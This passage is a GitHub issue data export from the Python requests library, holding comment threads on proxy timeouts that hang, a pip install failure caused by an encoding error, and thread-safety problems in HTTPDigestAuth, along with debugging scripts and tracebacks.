Maybe just leave this open until we come to a resolution over there\n", "I also encoutered a deadlock problem caused by this similar timeout issue.\n\nWhat I did is sending a GET request to some site (like http://jsonip.com) using an HTTP proxy to get proxy's public ip address, the code is like:\n\n```\ns = requests.Session()\ns.proxies = {'http': 'http://xx.xx.xx.xx:xxx', 'https': 'http://xx.xx.xx.xx:xxx'}\nr = s.get('http://jsonip.com', timeout=5)\nr.raise_for_status()\n...\n```\n\nAfter deadlock, the stack trace of the problmatic thread is (other threads are waiting for its completion):\n\n```\nFile: \"C:\\Python27\\lib\\threading.py\", line 783, in __bootstrap\n self.__bootstrap_inner()\nFile: \"C:\\Python27\\lib\\threading.py\", line 810, in __bootstrap_inner\n self.run()\nFile: \"C:\\Python27\\lib\\threading.py\", line 763, in run\n self.__target(*self.__args, **self.__kwargs)\nFile: \"C:\\Python27\\lib\\site-packages\\concurrent\\futures\\thread.py\", line 73, in _worker\n work_item.run()\nFile: \"C:\\Python27\\lib\\site-packages\\concurrent\\futures\\thread.py\", line 61, in run\n result = self.fn(*self.args, **self.kwargs)\nFile: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\app\\proxy_filter.py\", line 45, in test\n ip = self.public_ip.get(host)\nFile: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\utils.py\", line 91, in get\n ip = func(session, timeout)\nFile: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\get_ip.py\", line 43, in get_ip_4\n r = session.get('http://jsonip.com', timeout=timeout)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 473, in get\n return self.request('GET', url, **kwargs)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 599, in send\n history = [resp for resp in gen] if allow_redirects else 
[]\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 192, in resolve_redirects\n allow_redirects=False,\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\adapters.py\", line 370, in send\n timeout=timeout\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 513, in urlopen\n conn = self._get_conn(timeout=pool_timeout)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 231, in _get_conn\n return conn or self._new_conn()\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 717, in _new_conn\n return self._prepare_conn(conn)\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 690, in _prepare_conn\n conn.connect()\nFile: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connection.py\", line 217, in connect\n self._tunnel()\nFile: \"C:\\Python27\\lib\\httplib.py\", line 752, in _tunnel\n (version, code, message) = response._read_status()\nFile: \"C:\\Python27\\lib\\httplib.py\", line 365, in _read_status\n line = self.fp.readline(_MAXLINE + 1)\nFile: \"C:\\Python27\\lib\\socket.py\", line 476, in readline\n data = self._sock.recv(self._rbufsize)\n```\n\nI think it's the same bug discussed in this issue, right? The version of Requests is 2.5.0.\n", "We haven't shipped the fix for this yet. 
Ping @shazow and @sigmavirus24\n\nOn Wednesday, December 3, 2014, Zhang Yibin [email protected]\nwrote:\n\n> I also encoutered a deadlock problem caused by this similar timeout issue.\n> \n> What I did is sending a GET request to some site (like http://jsonip.com)\n> using an HTTP proxy to get proxy's public ip address, the code is like:\n> \n> s = requests.Session()\n> s.proxies = {'http': 'http://xx.xx.xx.xx:xxx', 'https': 'http://xx.xx.xx.xx:xxx'}\n> r = s.get('http://jsonip.com', timeout=5)\n> r.raise_for_status()\n> ...\n> \n> After deadlock, the stack trace of the problmatic thread is (other threads\n> are waiting for its completion):\n> \n> File: \"C:\\Python27\\lib\\threading.py\", line 783, in __bootstrap\n> self.__bootstrap_inner()\n> File: \"C:\\Python27\\lib\\threading.py\", line 810, in __bootstrap_inner\n> self.run()\n> File: \"C:\\Python27\\lib\\threading.py\", line 763, in run\n> self.__target(_self.__args, *_self.__kwargs)\n> File: \"C:\\Python27\\lib\\site-packages\\concurrent\\futures\\thread.py\", line 73, in _worker\n> work_item.run()\n> File: \"C:\\Python27\\lib\\site-packages\\concurrent\\futures\\thread.py\", line 61, in run\n> result = self.fn(_self.args, *_self.kwargs)\n> File: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\app\\proxy_filter.py\", line 45, in test\n> ip = self.public_ip.get(host)\n> File: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\utils.py\", line 91, in get\n> ip = func(session, timeout)\n> File: \"E:\\zbb\\projects\\crawler\\new\\zbb-crawler\\zbb_proxymanager\\get_ip.py\", line 43, in get_ip_4\n> r = session.get('http://jsonip.com', timeout=timeout)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 473, in get\n> return self.request('GET', url, *_kwargs)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 461, in request\n> resp = self.send(prep, *_send_kwargs)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", 
line 599, in send\n> history = [resp for resp in gen] if allow_redirects else []\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 192, in resolve_redirects\n> allow_redirects=False,\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\sessions.py\", line 573, in send\n> r = adapter.send(request, **kwargs)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\adapters.py\", line 370, in send\n> timeout=timeout\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 513, in urlopen\n> conn = self._get_conn(timeout=pool_timeout)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 231, in _get_conn\n> return conn or self._new_conn()\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 717, in _new_conn\n> return self._prepare_conn(conn)\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connectionpool.py\", line 690, in _prepare_conn\n> conn.connect()\n> File: \"C:\\Python27\\lib\\site-packages\\requests\\packages\\urllib3\\connection.py\", line 217, in connect\n> self._tunnel()\n> File: \"C:\\Python27\\lib\\httplib.py\", line 752, in _tunnel\n> (version, code, message) = response._read_status()\n> File: \"C:\\Python27\\lib\\httplib.py\", line 365, in _read_status\n> line = self.fp.readline(_MAXLINE + 1)\n> File: \"C:\\Python27\\lib\\socket.py\", line 476, in readline\n> data = self._sock.recv(self._rbufsize)\n> \n> I think it's the same bug discussed in this issue, right? The version of\n> Requests is 2.5.0.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2336#issuecomment-65412519\n> .\n\n## \n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n", "In my case, I didn't use proxy to visit any HTTPS site. 
Does it fix my problem?\n\nUPDATE: Now I have to use \"socket.setdefaulttimeout(30.0)\" everytime I use requests to access proxy, sigh...\n", "The urllib3 fix was merged before the v2.5.1 release.\n\nWith HTTPS proxy:\n\n```\ntime ./bin/python -c \"import requests; print requests.__version__; requests.get('https://google.com', timeout=0.01, proxies={'https':'https://1.1.1.1'})\"\n2.5.1\n```\n\n```\nTraceback (most recent call last):\n File \"app_main.py\", line 72, in run_toplevel\n File \"app_main.py\", line 562, in run_it\n File \"<string>\", line 1, in <module>\n File \"/tmp/req/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/tmp/req/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/tmp/req/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/tmp/req/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/tmp/req/site-packages/requests/adapters.py\", line 424, in send\n raise ConnectionError(e, request=request)\nConnectionError: HTTPSConnectionPool(host='google.com', port=443): Max retries exceeded with url: / (Caused by ProxyError('Cannot connect to proxy.', error(110, 'Connection timed out')))\n```\n\n```\nreal 2m7.502s\nuser 0m0.192s\nsys 0m0.025s\n```\n\nAnd with the HTTP proxy:\n\n```\ntime ./bin/python -c \"import requests; print requests.__version__; requests.get('https://google.com', timeout=0.01, proxies={'http':'http://1.1.1.1'})\"\n2.5.1\n```\n\n```\nTraceback (most recent call last):\n File \"app_main.py\", line 72, in run_toplevel\n File \"app_main.py\", line 562, in run_it\n File \"<string>\", line 1, in <module>\n File \"/tmp/req/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/tmp/req/site-packages/requests/api.py\", line 49, in request\n response = 
session.request(method=method, url=url, **kwargs)\n File \"/tmp/req/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/tmp/req/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/tmp/req/site-packages/requests/adapters.py\", line 433, in send\n raise ReadTimeout(e, request=request)\nReadTimeout: HTTPSConnectionPool(host='google.com', port=443): Read timed out. (read timeout=0.01)\n```\n\n```\nreal 0m0.281s\nuser 0m0.201s\nsys 0m0.024s\n```\n", "Thanks for your work all!\n", "Erm, IMHO the problem is not fixed :)\n", "In what sense?\n", "The request with HTTPS proxy is still not timing out as set by the parameter.\n", "Apologies, I don't know how I missed that. You're quite right.\n", "I think we need to pull urllib3 in before the next release to fix this. 2.5.1 was released mostly with the intention of fixing a bug with HTTPDigestAuth. @glaslos if we pull in a more modern copy of urllib3, can you test master for us to see if it fixes the problem? If it does I'm comfortable cutting 2.5.2\n", "Sounds good to me.\n", "Master has an up-to-date copy of urllib3 @glaslos. 
Test away\n", "@kevinburke could you confirm that your changes to urllib3 are in the requests master branch?\n", "urllib3 is still ignoring the timeout parameter if you use an HTTPS proxy:\n\n```\n(req)lrist@laptop-lrist /tmp/req $ cd requests/ && git rev-parse --short HEAD && cd ..\n673bd6a\n```\n\n```\n(req)lrist@laptop-lrist /tmp/req $ time ./bin/python -c \"import requests; print requests.__version__; print requests.__file__; requests.get('https://google.com', timeout=0.01, proxies={'https':'https://1.1.1.1'})\"\n2.5.1\n/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/__init__.py\n```\n\nIt takes more than 2 seconds to timeout with `timeout=0.01`\n\n``` python\nTraceback (most recent call last):\n File \"app_main.py\", line 72, in run_toplevel\n File \"app_main.py\", line 562, in run_it\n File \"<string>\", line 1, in <module>\n File \"/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/tmp/req/site-packages/requests-2.5.1-py2.7.egg/requests/adapters.py\", line 424, in send\n raise ConnectionError(e, request=request)\nConnectionError: HTTPSConnectionPool(host='google.com', port=443): Max retries exceeded with url: / (Caused by ProxyError('Cannot connect to proxy.', error(110, 'Connection timed out')))\n```\n\nTimings:\n\n```\nreal 2m7.452s\nuser 0m0.194s\nsys 0m0.024s\n```\n", "Any progress on this issue?\n", "FYI, requests doesn't support connections to HTTPS proxies. 
See https://github.com/kennethreitz/requests/issues/1622 and https://github.com/kennethreitz/requests/issues/2386\n", "Ah I see. Still, urllib3 is not handling the timeout parameter.\n", "> Ah I see. Still, urllib3 is not handling the timeout parameter.\n\nThis works for me on master, should be fixed with https://github.com/kennethreitz/requests/commit/d2d576b6b1101e2871c82f63adf2c2b534c2dabc\n", "I confirmed this is fixed in master. Thanks!\n", "not work with requests 2.10.0,\n\na fake proxies, this work fine.after 0.1s timeout.\n\n```\nrequests.get(\"http://baidu.com\",timeout=0.1,proxies={'http':'http://120.0.0.1:80'})\n```\n\nthis code with https proxies , get no response, just hang ther.\n\n```\nrequests.get(\"http://baidu.com\",timeout=0.1,proxies={'http':'http://120.0.0.1:80'})\n```\n", "@Petelin The code in both cases is identical: there is no difference. Please note, the timeout is _per socket event_: it is possible that you are hanging elsewhere in the stack.\n", "@Lukasa my bad \n\n```\nrequests.get(\"https://baidu.com\",timeout=0.1,proxies={'https':'http://120.0.0.1:80'})\n```\n\nuse a fake https proxie to access real https://baidu.com,it will just hang there.\n\ni do this in ipython with no context.\n", "I don't see the same behaviour: I see an instant timeout. It'd be good to know where you're blocking: what system are you running on?\n", "it's Ubuntu 14.04.2 LTS , 3.13.0-32-generic , all two version python not work.\n\n```\n╰─$ ipython\nPython 3.4.3 (default, Oct 14 2015, 20:28:29)\nType \"copyright\", \"credits\" or \"license\" for more information.\n\nIPython 4.1.1 -- An enhanced Interactive Python.\n? -> Introduction and overview of IPython's features.\n%quickref -> Quick reference.\nhelp -> Python's own help system.\nobject? -> Details about 'object', use 'object??' 
for extra details.\n\nIn [1]: import requests;requests.get(\"https://baidu.com\",timeout=0.1,proxies={'https':'http://120.0.0.1:80'})\n\n\n```\n\n```\n╰─$ python2.7 1 ↵\nPython 2.7.6 (default, Jun 22 2015, 17:58:13)\n[GCC 4.8.2] on linux2\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests;requests.get(\"https://baidu.com\",timeout=0.1,proxies={'https':'http://120.0.0.1:80'})\n\n\n```\n\nbut on my mac ipython5 python3 it works too.\n" ]
https://api.github.com/repos/psf/requests/issues/2335
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2335/labels{/name}
https://api.github.com/repos/psf/requests/issues/2335/comments
https://api.github.com/repos/psf/requests/issues/2335/events
https://github.com/psf/requests/issues/2335
48,597,173
MDU6SXNzdWU0ODU5NzE3Mw==
2,335
Cannot install anything depending on requests using pip 1.1 / Python 3.2
{ "avatar_url": "https://avatars.githubusercontent.com/u/140276?v=4", "events_url": "https://api.github.com/users/koterpillar/events{/privacy}", "followers_url": "https://api.github.com/users/koterpillar/followers", "following_url": "https://api.github.com/users/koterpillar/following{/other_user}", "gists_url": "https://api.github.com/users/koterpillar/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/koterpillar", "id": 140276, "login": "koterpillar", "node_id": "MDQ6VXNlcjE0MDI3Ng==", "organizations_url": "https://api.github.com/users/koterpillar/orgs", "received_events_url": "https://api.github.com/users/koterpillar/received_events", "repos_url": "https://api.github.com/users/koterpillar/repos", "site_admin": false, "starred_url": "https://api.github.com/users/koterpillar/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/koterpillar/subscriptions", "type": "User", "url": "https://api.github.com/users/koterpillar", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-11-13T04:34:34Z
2021-09-08T23:07:00Z
2014-11-13T14:42:22Z
NONE
resolved
Using stock Debian Wheezy configuration of Python 3.2 and pip 1.1, I can't install anything dependent on `requests`. For example, on a clean install: ``` # pip-3.2 install docker-py ... Downloading/unpacking requests>=2.2.1 (from docker-py>=0.4.0->docker-forklift) Downloading requests-2.4.3.tar.gz (438Kb): 438Kb downloaded Running setup.py egg_info for package requests Exception: Traceback (most recent call last): File "/usr/lib/python3/dist-packages/pip/basecommand.py", line 104, in main status = self.run(options, args) File "/usr/lib/python3/dist-packages/pip/commands/install.py", line 245, in run requirement_set.prepare_files(finder, force_root_egg_info=self.bundle, bundle=self.bundle) File "/usr/lib/python3/dist-packages/pip/req.py", line 1014, in prepare_files req_to_install.assert_source_matches_version() File "/usr/lib/python3/dist-packages/pip/req.py", line 359, in assert_source_matches_version version = self.installed_version File "/usr/lib/python3/dist-packages/pip/req.py", line 351, in installed_version return self.pkg_info()['version'] File "/usr/lib/python3/dist-packages/pip/req.py", line 318, in pkg_info data = self.egg_info_data('PKG-INFO') File "/usr/lib/python3/dist-packages/pip/req.py", line 261, in egg_info_data data = fp.read() File "/usr/lib/python3.2/encodings/ascii.py", line 26, in decode return codecs.ascii_decode(input, self.errors)[0] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 6265: ordinal not in range(128) ``` The offending line is in `HISTORY.rst`: "Refactored settings loading from environment — new Session.merge_environment_settings."
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2335/reactions" }
https://api.github.com/repos/psf/requests/issues/2335/timeline
null
completed
null
null
false
[ "Requests does not support Python 3.2, so I'm not really surprised by this.\n\nThat said, we can easily remove _this particular problem_. That makes no guarantees that requests works on Python 3.2, however, it's not part of our CI system and we don't test on the platform.\n", "We do not support Python 3.2 but in some of my projects, I do. In those projects I use requests and it installs fine with pip 1.5.6. The issue here is pip 1.1, which is horribly insecure to begin with because it does not verify any HTTPS connections it creates. pip 1.1 must be old enough to not know how to properly handle unicode values in text files. This isn't a bug in requests as far as I am concerned.\n", "Fair enough, I'm happy to go with that. Not a requests bug.\n", "If we look at pip install requests 2.4.3 on Python 3.2 on ubuntu on Travis-CI, it's clear that this is probably either a locale issue on the user's machine or a pip 1.1 issue. Besides, I have no desire to encourage usage of a wholly insecure tool by fixing something that would allow its usage.\n" ]
https://api.github.com/repos/psf/requests/issues/2334
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2334/labels{/name}
https://api.github.com/repos/psf/requests/issues/2334/comments
https://api.github.com/repos/psf/requests/issues/2334/events
https://github.com/psf/requests/issues/2334
48,540,996
MDU6SXNzdWU0ODU0MDk5Ng==
2,334
HTTPDigestAuth on session not thread-safe
{ "avatar_url": "https://avatars.githubusercontent.com/u/9700216?v=4", "events_url": "https://api.github.com/users/achorrath/events{/privacy}", "followers_url": "https://api.github.com/users/achorrath/followers", "following_url": "https://api.github.com/users/achorrath/following{/other_user}", "gists_url": "https://api.github.com/users/achorrath/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/achorrath", "id": 9700216, "login": "achorrath", "node_id": "MDQ6VXNlcjk3MDAyMTY=", "organizations_url": "https://api.github.com/users/achorrath/orgs", "received_events_url": "https://api.github.com/users/achorrath/received_events", "repos_url": "https://api.github.com/users/achorrath/repos", "site_admin": false, "starred_url": "https://api.github.com/users/achorrath/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/achorrath/subscriptions", "type": "User", "url": "https://api.github.com/users/achorrath", "user_view_type": "public" }
[]
closed
true
null
[]
null
12
2014-11-12T17:56:21Z
2021-09-08T18:00:53Z
2016-04-16T04:15:15Z
NONE
resolved
HTTPDigestAuth is not thread-safe when used on a session object. This script demonstrates the problem: ``` python import Queue import sys import threading import requests s = requests.Session() s.auth = requests.auth.HTTPDigestAuth('user', 'passwd') def tprint(astr): t = threading.current_thread().name sys.stdout.write('%s: %s\n' % (t, astr)) def worker(): resp = s.get('http://httpbin.org/digest-auth/auth/user/passwd') tprint(resp.status_code) t1 = threading.Thread(target=worker) t1.start() t2 = threading.Thread(target=worker) t2.start() t1.join() t2.join() ``` With debugging tprint()s added to auth.HTTPDigestAuth.handle_401(), the script generates output like this: ``` $ python threads_digest_1.py Thread-1: handle_401: num_401_calls: 1 Thread-1: handle_401: s_auth: Digest qop=auth, nonce="929169e53bab111e1c06e7a5207fe63b", realm="[email protected]", opaque="3e5078f698656ced77637bf72881e06b" Thread-2: handle_401: num_401_calls: 2 Thread-2: handle_401: s_auth: Digest qop=auth, nonce="f9bf0aa7be1fb59e85cbe0000f67a56a", realm="[email protected]", opaque="b0d6dee4bc0030c5bdefc2c76342479d" Thread-2: 401 Thread-1: 200 $ ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2334/reactions" }
https://api.github.com/repos/psf/requests/issues/2334/timeline
null
completed
null
null
false
[ "Session's aren't threadsafe so I'm not sure I understand why this is suprising.\n", "This is surprising because \"thread-safe\" is listed as one of the features of Requests, and there is nothing in the documentation to indicate that parts of it are not thread-safe.\n", "+1 with achorrath, I faced this issue and it's been quite hard to tackle down. Either clearly state that requests is not thread-safe from the documentation or provide a thread-safe session object.\n\nThanks.\n", "So the session isn't the problem here it's the digest instance. There's no good way for the digest auth instance to be thread safe when it doesn't have the same context that a session would have.\n", "Hi,\n\nBefore anything, here's a thanks for a great project to the authors and contributors. :)\n\nChiming in to share my experience which I believe is directly related to this case.\n- I faced what I believe to be the same underlying issue while working with multi-threaded NTLM authentication.\n- Seeing that the NTLM authenticator was not reusing connections correctly, I raised PR https://github.com/requests/requests-ntlm/pull/57 against requests-ntlm.\n- While testing harder and digging deeper I found out that my PR improved things, but was not enough to ensure correct multi-threaded NTLM authentication behaviour.\n- Given that NTLM does authentication on a per-connection basis, just like Digest auth, I suspected I would see the same types of failures with a simple multi-threaded Digest auth client.\n- I created one and reproduced the issue.\n- I came here looking for information: that's when I found this issue.\n\nMy suspicion about the underlying cause:\n- In `handle_401`, the Digest authenticator does a `r.connection.send(...)` to \"re-send\" the original request with the computed digest header in-place.\n- `r.connection.send` is, in fact, `HTTPAdapter.send` (in the example above, could be something else with a different adapter).\n- `HTTPAdapter.send` does a `conn = 
self.get_connection(...)`.\n- This ends up calling `PoolManager.connection_from_url(...)`.\n- This is the culprit: the PoolManager has no way of knowing how to return the correct connection given the fact that its argument is just the url.\n\nMy suspicion about a possible fix:\n(note: I'm not very familiar with the existing codebase. I may be making some mistakes and I'll gladly have them pointed out by someone.)\n- If my reasoning above is correct, the only way to ensure correct multi-threaded per-connection authentication at the requests API level is to somehow allow `handle_401` to \"re-send\" the request over the same connection.\n- This may require a different API given I don't think `HTTPAdapter.send`'s arguments may not comprise enough information so as to ensure the same connection is used.\n- Is this currently possible in any way? I don't think so (again, I'm not very familiar wth urllib3 API and innards). Thus an eventual fix may need to adapt / improve (while keeping backwards compatilibity, of course) the requests/urllib3 API and eventually, urllib3 internal APIs.\n\nAgain thanks in advance for any helpful input.\n", "So, we can do this if we _really_ want to by pulling the raw `httplib` connection object out and using it. 
That feels really nasty.\n", "Update, correcting myself:\n- Went reading RFC2617.\n- Figured out that my understanding about Digest auth was wrong: Digest auth does not authenticate connections (contrarily to NTLM), it does authenticate requests.\n- Given this, please disregard my considerations above concerning HTTPAdapters, Pools, etc.\n- Digged deeper into this particular case:\n - The culprit seems to be the fact that `HTTPDigestAuth.handle_401` only produces the `Authorization` header if it has been called less than 2 times (see ...`and num_401_calls < 2:` around line 172 in auth.py)\n - With two near-simultaneous threads, the first one entering `handle_401` will correctly produce the necessary auth headers, the second one will not.\n- My hack test:\n - Commented out the `and num_401_calls < 2` in auth.py.\n - Ran a variation of the test above successfully with 2, 20 and 200 threads (with the original code, I would only get 50% of the requests authenticated).\n- Possible fix:\n - The underlying `and num_401_calls < 2` seems to stem from #547 which, rightfully so, tries to prevent infinite auth failure loops. This means throwing the 401 call count away would lead to regressions.\n - A primitive approach would count 401 calls on a per-thread basis: not sure if feasible, not sure if elegant.\n\nHere are my 2c.\n\nPS: @Lukasa, given this, your comment about the (agreed, really nasty) possibility of pulling the raw `httplib` connection object would not apply here, but maybe feasible (at least for quick-hack tests) in https://github.com/requests/requests-ntlm. However, I'm not sure how to grab that object: any pointer? (lest's move this discussion away from this issue, shall we?) 
:)\n\nMore PS: For completeness, I dump my test code (easier to raise up thread count)\n\n``` python\n#!/usr/bin/env python\n# ------------------------------------------------------------------------------\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\n# ------------------------------------------------------------------------------\n\nimport logging\nimport threading\n\nimport requests\n\n\nclass ClientThread(threading.Thread):\n\n def __init__(self, session, url, *args, **kwargs):\n threading.Thread.__init__(self, *args, **kwargs)\n self.log = logging.getLogger('client.%s' % self.name)\n self.session = session\n self.url = url\n self.success = None\n\n def run(self, *args, **kwargs):\n self.response = self.session.get(self.url)\n self.log.info('self.response.status_code=%r' % self.response.status_code)\n self.log.debug('self.response.text=%r', self.response.text)\n self.success = self.response.status_code == requests.codes.ok\n\n\nif __name__ == '__main__':\n\n LOG_LEVEL = logging.INFO\n\n N_THREADS = 2\n\n URL = 'http://httpbin.org/digest-auth/auth/user/pass'\n AUTH_USERNAME = 'user'\n AUTH_PASSWORD = 'pass'\n\n logging.basicConfig(level=LOG_LEVEL)\n\n session = requests.session()\n session.auth = requests.auth.HTTPDigestAuth(AUTH_USERNAME, AUTH_PASSWORD)\n\n threads = [ClientThread(session, URL) for t in range(N_THREADS)]\n for t in threads:\n t.start()\n for t in threads:\n t.join()\n n_success = len([t.success for t in threads if t.success])\n\n log = logging.getLogger('client')\n log_level = logging.WARN if n_success!=N_THREADS else logging.INFO\n log.log(log_level, 'success rate %i/%i', n_success, N_THREADS)\n```\n", "Update:\n- I submited PR #2523 with a possible solution based on a per-thread num_401_calls count.\n- @achorrath , @vincentxb : Can you give it a run and confirm correct multi-threaded operation?\n", "Greetings all. Thanks for taking care of this @exvito. 
My only concern is about nonce and nonce_count values in a multi-threaded context. More generally, how do you deal with two threads being simultaneously in the handle_401() method?\n", "@vincentxb : thanks for your feedback. You are correct. @tardyp made the same comment in #2523. I'll go ahead and extend the per-thread storage to the other state attributes.\n", "Anything holding back these patches? 'm using a local patchset for requests_ntlm in production to work around the connection recycle problem (see https://github.com/requests/requests-ntlm/pull/51) but I would prefer to use the official repo.\n", "This has been fixed for almost a year now.\n" ]
https://api.github.com/repos/psf/requests/issues/2333
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2333/labels{/name}
https://api.github.com/repos/psf/requests/issues/2333/comments
https://api.github.com/repos/psf/requests/issues/2333/events
https://github.com/psf/requests/pull/2333
48,523,557
MDExOlB1bGxSZXF1ZXN0MjQzMDA1MDk=
2,333
Fix HTTPDigestAuth not to treat non-file as a file
{ "avatar_url": "https://avatars.githubusercontent.com/u/53781?v=4", "events_url": "https://api.github.com/users/akitada/events{/privacy}", "followers_url": "https://api.github.com/users/akitada/followers", "following_url": "https://api.github.com/users/akitada/following{/other_user}", "gists_url": "https://api.github.com/users/akitada/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/akitada", "id": 53781, "login": "akitada", "node_id": "MDQ6VXNlcjUzNzgx", "organizations_url": "https://api.github.com/users/akitada/orgs", "received_events_url": "https://api.github.com/users/akitada/received_events", "repos_url": "https://api.github.com/users/akitada/repos", "site_admin": false, "starred_url": "https://api.github.com/users/akitada/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/akitada/subscriptions", "type": "User", "url": "https://api.github.com/users/akitada", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-12T15:35:12Z
2021-09-08T09:01:17Z
2014-11-12T15:53:32Z
CONTRIBUTOR
resolved
Ensure pos is set to None when the body is not a file so that HTTPDigestAuth detects the type of the body correctly.
